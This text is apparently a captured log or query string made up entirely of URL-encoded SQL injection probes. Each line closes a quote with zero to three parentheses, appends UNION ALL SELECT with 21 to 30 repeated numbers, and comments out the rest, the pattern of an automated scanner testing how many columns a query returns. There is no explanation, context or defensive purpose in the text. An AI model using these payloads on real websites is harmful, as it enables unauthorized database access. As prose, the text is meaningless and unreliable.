-8146%27%20UNION%20ALL%20SELECT%201525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525%2C1525--%20 -4137%27%29%20UNION%20ALL%20SELECT%208346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346--%20 -8600%27%29%20UNION%20ALL%20SELECT%201943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943%2C1943--%20 -5928%27%29%20UNION%20ALL%20SELECT%209249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249%2C9249--%20 -9408%27%29%20UNION%20ALL%20SELECT%207309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309--%20 -3714%27%29%20UNION%20ALL%20SELECT%203471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471--%20 -8141%27%29%20UNION%20ALL%20SELECT%208815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815--%20 -4180%27%29%20UNION%20ALL%20SELECT%208299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299%2C8299--%20 -7900%27%29%20UNION%20ALL%20SELECT%201838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838--%20 -3136%27%29%20UNION%20ALL%20SELECT%201132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132--%20 -8326%27%29%20UNION%20ALL%20SELECT%207273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273%2C7273--%20 -8441%27%29%29%20UNION%20ALL%20SELECT%201165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165--%20 -6377%27%29%29%20UNION%20ALL%20SELECT%201152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152--%20 -1222%27%29%29%20UNION%20ALL%20SELECT%201330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330%2C1330--%20 -6522%27%29%29%20UNION%20ALL%20SELECT%204417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417%2C4417--%20 -7590%27%29%29%20UNION%20ALL%20SELECT%205933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933--%20 -6481%27%29%29%20UNION%20ALL%20SELECT%209338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338--%20 -2270%27%29%29%20UNION%20ALL%20SELECT%207834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834--%20 -6932%27%29%29%20UNION%20ALL%20SELECT%207820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820%2C7820--%20 -5595%27%29%29%20UNION%20ALL%20SELECT%204968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968--%20 -1150%27%29%29%20UNION%20ALL%20SELECT%208102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102%2C8102--%20 -5635%27%29%29%29%20UNION%20ALL%20SELECT%204028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028%2C4028--%20 -3351%27%29%29%29%20UNION%20ALL%20SELECT%203588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588%2C3588--%20 -1764%27%29%29%29%20UNION%20ALL%20SELECT%208741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741%2C8741--%20 -2287%27%29%29%29%20UNION%20ALL%20SELECT%209377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377%2C9377--%20 -3980%27%29%29%29%20UNION%20ALL%20SELECT%207429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429%2C7429--%20 -9923%27%29%29%29%20UNION%20ALL%20SELECT%209825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825%2C9825--%20 -9197%27%29%29%29%20UNION%20ALL%20SELECT%205815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815%2C5815--%20 -9795%27%29%29%29%20UNION%20ALL%20SELECT%202493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493--%20 -8753%27%29%29%29%20UNION%20ALL%20SELECT%202165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165%2C2165--%20 -1434%27%29%29%29%20UNION%20ALL%20SELECT%209060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060%2C9060--%20 -7664%27%20UNION%20ALL%20SELECT%207220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220%2C7220--%20 -3960%27%20UNION%20ALL%20SELECT%203312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312%2C3312--%20 -2288%27%20UNION%20ALL%20SELECT%205306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306--%20 -7397%27%20UNION%20ALL%20SELECT%208458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458%2C8458--%20 -1440%27%20UNION%20ALL%20SELECT%208346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346--%20 -3291%27%20UNION%20ALL%20SELECT%206406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406--%20 -6561%27%20UNION%20ALL%20SELECT%204694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694%2C4694--%20 -4830%27%20UNION%20ALL%20SELECT%206532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532--%20 -8090%27%20UNION%20ALL%20SELECT%201712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712%2C1712--%20 -4778%27%20UNION%20ALL%20SELECT%206891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891%2C6891--%20 -7636%22%29%20UNION%20ALL%20SELECT%204576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576%2C4576--%20 -2762%22%29%20UNION%20ALL%20SELECT%205050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050--%20 -5258%22%29%20UNION%20ALL%20SELECT%209527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527%2C9527--%20 -7187%22%29%20UNION%20ALL%20SELECT%202580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580%2C2580--%20 -2131%22%29%20UNION%20ALL%20SELECT%205483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483--%20 -7861%22%29%20UNION%20ALL%20SELECT%201151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151--%20 -7508%22%29%20UNION%20ALL%20SELECT%209080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080--%20 -9708%22%29%20UNION%20ALL%20SELECT%204681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681--%20 -3121%22%29%20UNION%20ALL%20SELECT%206991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991%2C6991--%20 -1787%22%29%20UNION%20ALL%20SELECT%207997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997%2C7997--%20 -3166%22%29%29%20UNION%20ALL%20SELECT%207231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231%2C7231--%20 -5496%22%29%29%20UNION%20ALL%20SELECT%206436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436--%20 -8611%22%29%29%20UNION%20ALL%20SELECT%204504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504%2C4504--%20 -7361%22%29%29%20UNION%20ALL%20SELECT%208115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115%2C8115--%20 -1368%22%29%29%20UNION%20ALL%20SELECT%203229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229--%20 -4630%22%29%29%20UNION%20ALL%20SELECT%208758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758--%20 -3733%22%29%29%20UNION%20ALL%20SELECT%206532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532%2C6532--%20 -5956%22%29%29%20UNION%20ALL%20SELECT%206082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082%2C6082--%20 -2719%22%29%29%20UNION%20ALL%20SELECT%206921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921%2C6921--%20 -6015%22%29%29%20UNION%20ALL%20SELECT%203521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521%2C3521--%20 -6923%22%29%29%29%20UNION%20ALL%20SELECT%203425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425%2C3425--%20 -7569%22%29%29%29%20UNION%20ALL%20SELECT%203152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152%2C3152--%20 -4128%22%29%29%29%20UNION%20ALL%20SELECT%206338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338--%20 -2229%22%29%29%29%20UNION%20ALL%20SELECT%205527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527%2C5527--%20 -5816%22%29%29%29%20UNION%20ALL%20SELECT%206099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099%2C6099--%20 -6386%22%29%29%29%20UNION%20ALL%20SELECT%203097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097--%20 -8126%22%29%29%29%20UNION%20ALL%20SELECT%201517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517%2C1517--%20 -2323%22%29%29%29%20UNION%20ALL%20SELECT%206128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128--%20 -1204%22%29%29%29%20UNION%20ALL%20SELECT%201427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427%2C1427--%20 -3013%22%29%29%29%20UNION%20ALL%20SELECT%206797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797--%20 -9525%22%20UNION%20ALL%20SELECT%205642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642--%20 -8272%22%20UNION%20ALL%20SELECT%204062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062--%20 -1815%22%20UNION%20ALL%20SELECT%205500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500%2C5500--%20 -1582%22%20UNION%20ALL%20SELECT%201403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403--%20 -5125%22%20UNION%20ALL%20SELECT%208234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234--%20 -5607%22%20UNION%20ALL%20SELECT%208679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679--%20 -1373%22%20UNION%20ALL%20SELECT%209655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655%2C9655--%20 -6430%22%20UNION%20ALL%20SELECT%207265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265--%20 -4126%22%20UNION%20ALL%20SELECT%207147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147%2C7147--%20 -1078%22%20UNION%20ALL%20SELECT%204104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104%2C4104--%20 -9585%22%29%20UNION%20ALL%20SELECT%205438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438%2C5438--%20 -5955%22%29%20UNION%20ALL%20SELECT%201989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989%2C1989--%20 -8268%22%29%20UNION%20ALL%20SELECT%203031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031--%20 -4916%22%29%20UNION%20ALL%20SELECT%208354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354%2C8354--%20 -6571%22%29%20UNION%20ALL%20SELECT%209400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400--%20 -8114%22%29%20UNION%20ALL%20SELECT%202811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811--%20 -8480%22%29%20UNION%20ALL%20SELECT%208527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527--%20 -5210%22%29%20UNION%20ALL%20SELECT%205463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463%2C5463--%20 -7869%22%29%20UNION%20ALL%20SELECT%206051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051--%20 -1607%22%29%20UNION%20ALL%20SELECT%202472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472--%20 -8735%22%29%29%20UNION%20ALL%20SELECT%203783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783%2C3783--%20 -8812%22%29%29%20UNION%20ALL%20SELECT%205845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845--%20 -9526%22%29%29%20UNION%20ALL%20SELECT%205706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706%2C5706--%20 -9075%22%29%29%20UNION%20ALL%20SELECT%202928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928%2C2928--%20 -2758%22%29%29%20UNION%20ALL%20SELECT%203202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202--%20 -2214%22%29%29%20UNION%20ALL%20SELECT%208153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153%2C8153--%20 